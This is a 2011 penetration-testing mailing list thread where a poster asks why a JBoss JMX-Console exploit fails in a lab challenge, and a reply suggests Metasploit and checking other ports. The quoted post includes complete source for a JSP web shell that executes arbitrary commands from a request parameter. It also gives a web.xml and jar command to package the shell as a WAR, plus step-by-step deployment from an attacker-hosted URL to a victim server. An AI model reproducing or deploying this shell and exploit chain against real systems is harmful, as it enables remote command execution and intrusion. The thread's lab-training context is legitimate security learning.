|
|
Penetration Testing
breaking jboss with a browser? not happening Jan 14 2011 08:02PM lazers (a alii85 gmail com) (5 replies) RE: breaking jboss with a browser? not happening Jan 19 2011 08:02AM Hembrow, Chris (chris hembrow interserve com) (3 replies) Re: breaking jboss with a browser? not happening Jan 20 2011 07:13PM Matt Gardenghi (mtgarden gmail com) Re: breaking jboss with a browser? not happening Jan 20 2011 06:37PM YGN Ethical Hacker Group (lists yehg net) Re: breaking jboss with a browser? not happening Jan 18 2011 12:19PM psiinon (psiinon gmail com) (1 replies) |
|
Privacy Statement |
>
> I have been given task to break into jboss application by my senior sec
> manager at my company.
> Its a hacking challenge staged in a test lab This is what i have been given.
> A web-access to jboss.
> Yes that pretty much it<3. He believes in less is more philosophy. With some
> get to start working info. I have been told that a vulnerability exists
> inthe application and its no 0 day exploit its an known vulnerability.It is
> set as an open-book challenge i can get help anywhere i like. So what i did
> so for?
>
>
> Yes i google ; but i also run a nessus scan and the scan brought me one HIGH
> vulnerability. Its has to do with the default Jboss installation using the
> JMX-Console. Its not a new vulnerability i was able to reach this conclusion
> as i start googling. This particular vulnerability is very popular; I was
> saying to myself that my problems are over and i would be break it into
> jboss in record time. But that has been largely un-true. Why? Well if it
> wasn't true i wouldn't be here. I did the following (in steps)
>
>
> attack vector: deployment scanner feature
>
>
>
>
>
> 1.confirmed the default installation (by accessing localhost:9090) in my
> case its
>
> 9090 not 8080 as in hacking literature. Probably this is because em using a
> new version (idk exact reason)
>
>
>
> 2.i wrote this jsp script(cmd.jsp) astold in sites.
>
> <%@ page import="java.util.*,java.io.*"%>
>
> <%
>
> %>
>
> <HTML><BODY>
>
> Commands with JSP
>
> <FORM METHOD="GET" NAME="myform"ACTION="">
>
> <INPUT TYPE="text" NAME="cmd">
>
> <INPUT TYPE="submit" VALUE="Send">
>
> </FORM>
>
> <pre>
>
> <%
>
> if (request.getParameter("cmd") != null) {
>
> out.println("Command: " + request.getParameter("cmd") +"<BR>");
>
> Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));
>
> OutputStream os = p.getOutputStream();
>
> InputStream in = p.getInputStream();
>
> DataInputStream dis = new DataInputStream(in);
>
> String disr = dis.readLine();
>
> while ( disr != null ) {
>
> out.println(disr);
>
> disr = dis.readLine();
>
> }
>
> }
>
> %>
>
> </pre>
>
> </BODY></HTML>
>
>
>
> 3.next i create a web.xml file to be placed in WEB-INF folder
>
>
>
> <?xml version="1.0" ?>
>
> <web-app xmlns="http://java.sun.com/xml/ns/j2ee"
>
> xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
>
> xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
>
> http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
>
> version="2.4">
>
> <servlet>
>
> <servlet-name>Command</servlet-name>
>
> <jsp-file>/cmd.jsp</jsp-file>
>
> </servlet>
>
> </web-app>
>
>
>
> 4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF folder
>
>
>
> jar cvf cmd.war WEB-INF cmd.jsp
>
>
>
> 5. I put this file in http-apache server. File cmd.war reside at htdocs
> folder. Can be accessed by url: mywebserver:80/cmd.war
>
>
>
> 6.i go back to jboss defualt page and navigate myself to
> jboss.deploymentpage.
>
>
>
> 7. in the addurl tab i enter path for my cmd.war file as
>
> http://mywebserver/cmd.war
>
>
>
> 8. next i goto victim webserver in attempt to access my uploaded application
> http://victim:9090/cmd/cmd.jsp
>
>
>
> 9. i get HTTP STATUS 404- /cmd/cmd.jsp
>
>
>
> my app is suppose to be hot deployed by the jboss; but this is not the case
> coz even after 10-20 times after u have access the file i get the same error
> page. I want to know what is the reason for the behavior. I know there
> exists other attack vector (e.g rmi and etc) but i want to stick to this
> until i don't figure out the reason for this failure of exploit.
>
>
>
> Em i compiling the .jsp file with incorrect syntax? do i need to have tomcat
> server installed instead? I read it on internet that there could be some
> problems in the jboss trying to get reverse shell on your web-server as
> jboss is it work in bind-shell mode only? I'm really clueless to what i
> happening i spent 12 works on this single attack vector but em not making
> head-ways.
>
>
>
> jboss gurus help me.
>
Metasploit has a plugin that will do this automatically against JBoss
if you know the credentials.
I'd also check where the file is being deployed. I did this on a test
once and there were two open ports, I installed the app on one but
then got a 404 when browsing to it, when I accessed it through the
other port it worked fine.
Robin
------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board
Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------
[ reply ]